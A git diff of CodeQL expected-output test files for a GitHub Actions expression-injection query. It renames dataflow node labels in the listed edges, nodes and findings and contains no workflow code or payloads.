@@ -130,20 +130,20 @@ nodes | .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | semmle.label | id: summary [value] | +| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | | .github/workflows/simple1.yml:15:14:16:50 | \| | semmle.label | \| | -| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | semmle.label | name: G ... d files | -| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | +| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | | .github/workflows/simple2.yml:28:14:31:15 | \| | semmle.label | \| | -| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | semmle.label | job_out ... test }} [job_output] | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | semmle.label | ${{ ste ... test }} | -| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | semmle.label | id: step0 [value] | +| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | | .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | semmle.label | ${{ git ... 
sage }} | -| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | semmle.label | id: step1 [MSG] | +| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | semmle.label | ${{ ste ... value}} | -| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | semmle.label | id: step2 [test] | +| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | semmle.label | Run Step: step2 [test] | | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | semmle.label | ${{step ... s.MSG}} | | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | 
@@ -215,7 +215,7 @@ subpaths | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/simple1.yml:15:14:16:50 | \| | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:15:14:16:50 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential expression injection, which may be controlled by an external user. | | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... 
age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected index 13c81bd08e0..b21ac80574b 100644 --- a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected 
@@ -1,58 +1,58 @@ edges -| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | +| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | -| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | -| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | .github/workflows/changed-files.yml:21:14:24:15 | \| | -| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | -| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | -| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | +| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | +| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:21:14:24:15 | \| | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | +| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... 
ssage}} | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | .github/workflows/cross3.yml:41:12:43:5 | \| | | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | .github/workflows/cross3.yml:61:21:68:47 | \| | | .github/workflows/cross3.yml:61:21:68:47 | \| | .github/workflows/cross3.yml:47:12:53:109 | \| | -| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | -| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | -| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | -| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | -| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | -| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | -| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... 
d files [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | +| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | +| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | +| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | +| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | +| .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | +| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | +| .github/workflows/inter-job.yml:15:9:19:6 | Uses Step: source | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... 
iles }} | .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | | .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | | .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | -| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | -| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | -| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | +| .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | +| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | +| .github/workflows/matrix.yml:17:9:21:2 | Uses Step: set-matrix | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | .github/workflows/matrix.yml:41:12:42:31 | \| | -| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | .github/workflows/simple1.yml:15:14:16:50 | \| | -| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | -| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | -| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | .github/workflows/simple2.yml:28:14:31:15 | \| | -| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... 
iles }} | .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | -| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | -| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | -| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | -| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | -| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | -| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | -| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | +| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:15:14:16:50 | \| | +| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | +| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | +| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:28:14:31:15 | \| | +| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... 
test }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | +| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | +| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | +| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | +| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | +| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | +| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | nodes -| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | +| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | semmle.label | ${{gith ... title}} | | .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | semmle.label | ${{env.ISSUE_TITLE}} | | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | semmle.label | \| | -| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | | .github/workflows/changed-files.yml:21:14:24:15 | \| | semmle.label | \| | | .github/workflows/comment_issue.yml:7:12:8:48 | \| | semmle.label | \| | | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... 
ody }}' | | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | | .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | | .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | semmle.label | \| | -| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | semmle.label | ${{gith ... ssage}} | | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | | .github/workflows/cross3.yml:41:12:43:5 | \| | semmle.label | \| | 
@@ -68,17 +68,17 @@ nodes | .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | semmle.label | name: E ... ial URL [initial_url] | +| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | semmle.label | Run Step: extract-url [initial_url] | | .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | semmle.label | ${{ git ... body }} | -| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | semmle.label | name: G ... bugging [redirected_url] | +| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | semmle.label | Run Step: curl [redirected_url] | | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | semmle.label | name: T ... ter PNG [trimmed_url] | +| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | semmle.label | Run Step: trim-url [trimmed_url] | | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | semmle.label | \| | -| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | semmle.label | job_out ... alue }} [job_output] | +| .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... 
alue }} | -| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | semmle.label | name: G ... d files | -| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | +| .github/workflows/inter-job.yml:15:9:19:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | @@ -89,9 +89,9 @@ nodes | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | | .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | -| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | semmle.label | matrix: ... iles }} [matrix] | +| .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | semmle.label | Job outputs node [matrix] | | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/matrix.yml:17:9:21:2 | Uses Step: set-matrix | semmle.label | Uses Step: set-matrix | | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | semmle.label | ${{ fro ... rix) }} | | .github/workflows/matrix.yml:41:12:42:31 | \| | semmle.label | \| | | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | 
@@ -130,20 +130,20 @@ nodes | .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | semmle.label | id: summary [value] | +| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | | .github/workflows/simple1.yml:15:14:16:50 | \| | semmle.label | \| | -| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | semmle.label | name: G ... d files | -| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | +| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | | .github/workflows/simple2.yml:28:14:31:15 | \| | semmle.label | \| | -| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | semmle.label | job_out ... test }} [job_output] | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | semmle.label | ${{ ste ... test }} | -| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | semmle.label | id: step0 [value] | +| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | | .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | semmle.label | ${{ git ... 
sage }} | -| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | semmle.label | id: step1 [MSG] | +| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | semmle.label | ${{ ste ... value}} | -| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | semmle.label | id: step2 [test] | +| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | semmle.label | Run Step: step2 [test] | | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | semmle.label | ${{step ... s.MSG}} | | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | 
@@ -158,7 +158,7 @@ nodes subpaths #select | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/changed-files.yml:21:14:24:15 | \| | .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | .github/workflows/changed-files.yml:21:14:24:15 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/changed-files.yml:21:14:24:15 | \| | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:21:14:24:15 | \| | Potential expression injection, which may be controlled by an external user. | | .github/workflows/comment_issue.yml:7:12:8:48 | \| | .github/workflows/comment_issue.yml:7:12:8:48 | \| | .github/workflows/comment_issue.yml:7:12:8:48 | \| | Potential expression injection, which may be controlled by an external user. | | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | 
@@ -176,13 +176,13 @@ subpaths | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | .github/workflows/inter-job.yml:15:9:19:6 | Uses Step: source | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. 
| | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/matrix.yml:41:12:42:31 | \| | .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | .github/workflows/matrix.yml:41:12:42:31 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/matrix.yml:41:12:42:31 | \| | .github/workflows/matrix.yml:17:9:21:2 | Uses Step: set-matrix | .github/workflows/matrix.yml:41:12:42:31 | \| | Potential expression injection, which may be controlled by an external user. | | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. 
| | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | 
